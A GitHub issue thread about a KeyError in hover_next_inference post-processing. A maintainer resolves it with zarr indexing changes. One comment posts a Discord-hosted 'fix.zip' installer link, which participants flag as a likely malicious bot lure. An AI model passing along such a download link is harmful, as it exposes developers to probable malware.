### ISSUE TITLE
pcls_ and props are becoming desynced, KeyError thrown

### ISSUE THREAD

**Issue by eokoshi** [digitalpathologybern/hover_next_inference#10]
I am experiencing an error in postprocessing. 
in the write() function on line 49 of post_process_utils.py, I am getting an error where the key id_ does not exist in the dict pcls_
for example, pcls_ will look like this `pcls_ =  {'6': 2, '7': 2, ...}`, yet `props = [(1, (...)), (2, (...)), ...]`
so, when id_ is taken from props `id_ = 1` and `pcls_[str(1)]` throws a KeyError
Seems like something is going wrong with keeping things synced using `running_max` or which chunks are being processed in what order, but I do not understand this code well enough to implement a fix. 
I have tried setting `pp_workers` to 1 in main.py, but no luck. 
Thank you.

**Comment by 777Naity** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by eokoshi** [comment]
^ above comment is highly suspicious, is this person actually affiliated with this project?

**Comment by eliasbaumann** [comment]
Hey, I am sorry for that link, it seemed like a malicious bot. I have deleted the message and hope you did not click on the link. Can you give a little bit more details on what kind of input you are running? A WSI? And are you running everything with a standard inference template or did you modify something?

**Comment by eokoshi** [comment]
I would like to perform cell detection on a directory of .png images. 
I have tried putting the input in as a glob string, but then it processes each image one at a time and throws some BrokenProcess errors.
I then saved the entire directory as a numpy array, and am using that array as input -- shape is (6956, 224, 224, 3)

I only modified one line of the source code - post_process_utils.py line 61
my machine has python 3.8.10, so it does not have access to the |= operator
I changed it to the below:
`pcls_out = {**pcls_out, **pcls_new}`

Here is also how I am calling the function in my own .py script

```python
def detect_cells_hovernext(
    input_dir: str,
    output_dir: str,
    model: str,
):
    """
    Adapted from https://github.com/digitalpathologybern/hover_next_inference?tab=readme-ov-file
    
    Parameters:
        input_dir (str): glob string for dir with image (tiles) inside
        output_dir (str): dir to save output
        model (str): name of model (e.g. lizard_convnextv2_large). Make sure the unzipped directory is in the hover_next_inference folder.
            Download here: https://github.com/digitalpathologybern/hover_next_inference?tab=readme-ov-file#model-weights
    """
    params = {
        "input":input_dir,
        "output_root":output_dir,
        "cp":model,
        "only_inference":False,
        "metric":"f1",
        "batch_size":64,
        "tta":4,
        "save_polygon":False,
        "tile_size":224,
        "overlap":0.9375,
        "inf_workers":16,
        "inf_writers":2,
        "pp_tiling":8,
        "pp_overlap":224,
        "pp_workers":1,
        "keep_raw":False,
        "cache":None,
    }

    from hover_next_inference.main import main
    main(params)

    # output saved to disk
    return
```

**Comment by eokoshi** [comment]
narrowing down the issue, it appears that in post_process_utils.py line 54, the keys of `pcls_` are updated by adding `running_max`, but on line 53, there is something going wrong with adding running_max to the values in `pinst_`, so the values go out of sync.

i am not very familiar with zarr arrays, so I do not know how to access the values in pinst_ to see if and how they are updating on line 53... any help would be greatly appreciated

**Comment by eliasbaumann** [comment]
I quickly had to reproduce your issue. 
If you add 
```
if params["input_type"] != "wsi":
           # add this
            pinst_ = np.asarray(pinst_, dtype=np.int32)
```
the post-processing continues at least. Let me know if the output looks correct to you.

I am investigating the glob issue next, because that should in theory work as well, but will give you single outputs for each file (which is probably not what you want).

**Comment by eokoshi** [comment]
i altered the code by commenting out lines 178 -> 181 in the `work()` function in post_processing_utils.py, and the program now runs. No issues with multiprocessing as well. (Changed pp_workers to >1)
```python
    # pred_inst = zarr.array(
    #     pred_inst.astype(np.int32),
    #     compressor=Blosc(cname="zstd", clevel=3, shuffle=Blosc.SHUFFLE),
    # )
```

However, it feels suboptimal to stop using the zarr array. Is there a way to ensure that the values in the zarr array are updated with `pinst_[pinst_ != 0] += running_max` ?

Now that `pinst_` is a normal numpy array, it is slowly taking up more memory as the processing continues. 

I will report back if I experience an issue because of this, as the processing is underway now. 

thank you for your quick response! please feel free to ask me any more questions

**Comment by eliasbaumann** [comment]
But for your exact purpose, it might also make sense to take a look at the hover_next_train repository and use the evaluate.py where a tile dataset like yours is loaded and processed.

**Comment by eokoshi** [comment]
Thank you for the suggestion, I will take a look.

**Comment by eliasbaumann** [comment]
> However, it feels suboptimal to stop using the zarr array. Is there a way to ensure that the values in the zarr array are updated with `pinst_[pinst_ != 0] += running_max` ?

you can do this:
`pinst_.vindex[pinst_[:] != 0] += running_max`

**Comment by eokoshi** [comment]
Thank you for this fix, I swapped out line 53 with the suggested line and everything is working smoothly. You are right, there is no difference in memory usage or processing speed using a zarr array for pinst_ or not. 

Thank you again for the prompt response!
